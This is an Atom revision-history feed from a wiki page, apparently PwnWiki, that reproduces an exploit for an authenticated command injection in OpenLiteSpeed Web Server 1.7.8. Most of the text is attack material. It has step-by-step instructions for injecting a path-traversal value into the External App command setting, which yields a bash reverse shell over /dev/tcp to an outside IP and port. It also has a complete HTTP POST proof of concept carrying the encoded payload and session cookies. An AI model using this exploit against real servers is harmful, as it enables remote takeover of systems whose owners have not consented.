https://pwnwiki.com/index.php?action=history&feed=atom&title=Openlitespeed_Web_Server_1.7.8_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
Openlitespeed Web Server 1.7.8 命令注入漏洞 - Revision history
2026-04-20T23:45:29Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Openlitespeed_Web_Server_1.7.8_%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1268&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) # Date: 26/1/2021 # Exploit Author: cmOs - SunCSR # Vendor Homepage: https://o..."
2021-04-08T09:39:06Z
<p>Created page with "==EXP== <pre> # Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) # Date: 26/1/2021 # Exploit Author: cmOs - SunCSR # Vendor Homepage: https://o..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated)<br />
# Date: 26/1/2021<br />
# Exploit Author: cmOs - SunCSR<br />
# Vendor Homepage: https://openlitespeed.org/<br />
# Software Link: https://openlitespeed.org/kb/install-from-binary/<br />
# Version: 1.7.8<br />
# Tested on Windows 10<br />
<br />
<br />
Step 1: Log in to the dashboard using the Administrator account.<br />
Step 2 : Access Server Configuration > External App > Command<br />
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)<br />
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value<br />
Step 5: Graceful Restart<br />
<br />
[POC]<br />
<br />
POST /view/confMgr.php HTTP/1.1<br />
Host: target:7080<br />
Connection: close<br />
Content-Length: 579<br />
Accept: text/html, */*; q=0.01<br />
X-Requested-With: XMLHttpRequest<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
Origin: https://target:7080<br />
Sec-Fetch-Site: same-origin<br />
Sec-Fetch-Mode: cors<br />
Sec-Fetch-Dest: empty<br />
Referer: https://target:7080/index.php<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Cookie: LSUI37FE0C43B84483E0=b8e3df9c8a36fc631dd688accca82aee;<br />
litespeed_admin_lang=english; LSID37FE0C43B84483E0=W7zzfuEznhk%3D;<br />
LSPA37FE0C43B84483E0=excYiZbpUS4%3D<br />
<br />
name=lsphp&address=uds%3A%2F%2Ftmp%2Flshttpd%2Flsphp.sock&note=&maxConns=10&env=PHP_LSAPI_CHILDREN%3D10%0D%0ALSAPI_AVOID_FORK%3D200M&initTimeout=60&retryTimeout=0&persistConn=1&pcKeepAliveTimeout=&respBuffer=1&autoStart=2&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+'bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.17.52%2F1234+0%3E%261'&backlog=100&instances=0&extUser=&extGroup=&umask=&runOnStartUp=3&extMaxIdleTime=&priority=0&memSoftLimit=2047M&memHardLimit=2047M&procSoftLimit=1400&procHardLimit=1500&a=s&m=serv&p=ext&t=A_EXT_LSAPI&r=lsphp&tk=0.08677800+1611561077<br />
</pre></div>
Pwnwiki